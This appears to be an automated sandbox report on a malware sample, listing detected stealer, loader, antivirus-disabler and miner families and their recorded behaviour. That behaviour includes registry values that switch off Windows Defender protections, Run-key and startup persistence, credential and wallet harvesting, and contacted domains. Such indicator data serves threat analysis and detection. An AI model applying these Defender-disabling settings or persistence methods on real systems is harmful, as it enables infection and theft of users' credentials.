Analysis Overview
SHA256
81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d
Threat Level: Known bad
The file 81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d was found to be: Known bad.
Malicious Activity Summary
Stealc family
Detect Vidar Stealer
SystemBC
Vidar
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender Real-time Protection settings
xmrig
Vidar family
Detects Healer an antivirus disabler dropper
Systembc family
Amadey
Healer family
Modifies Windows Defender TamperProtection settings
Stealc
Healer
Xmrig family
Modifies Windows Defender notification settings
Amadey family
XMRig Miner payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Blocklisted process makes network request
Drops startup file
Reads user/profile data of local email clients
Identifies Wine through registry keys
Reads user/profile data of web browsers
.NET Reactor proctector
Checks computer location settings
Executes dropped EXE
Reads data files stored by FTP clients
Windows security modification
Checks BIOS information in registry
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in Windows directory
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of UnmapMainImage
Modifies registry class
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 04:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 04:46
Reported
2025-03-06 04:48
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
Browser Information Discovery
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2512 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2512 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2512 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2512 wrote to memory of 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe
"C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 1240
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
Files
memory/2512-0-0x0000000001170000-0x000000000148C000-memory.dmp
memory/2512-1-0x0000000077280000-0x0000000077282000-memory.dmp
memory/2512-2-0x0000000001171000-0x00000000011D1000-memory.dmp
memory/2512-3-0x0000000001170000-0x000000000148C000-memory.dmp
memory/2512-4-0x0000000001170000-0x000000000148C000-memory.dmp
memory/2512-5-0x0000000001170000-0x000000000148C000-memory.dmp
memory/2512-7-0x0000000001170000-0x000000000148C000-memory.dmp
memory/2512-8-0x0000000001171000-0x00000000011D1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 04:46
Reported
2025-03-06 04:48
Platform
win10v2004-20250217-en
Max time kernel
144s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Vidar
Vidar family
Xmrig family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\rvhetm\ktgtc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\rvhetm\ktgtc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\rvhetm\ktgtc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\ProgramData\rvhetm\ktgtc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\781a56e4da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110370101\\781a56e4da.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1109dfe086.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110380101\\1109dfe086.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
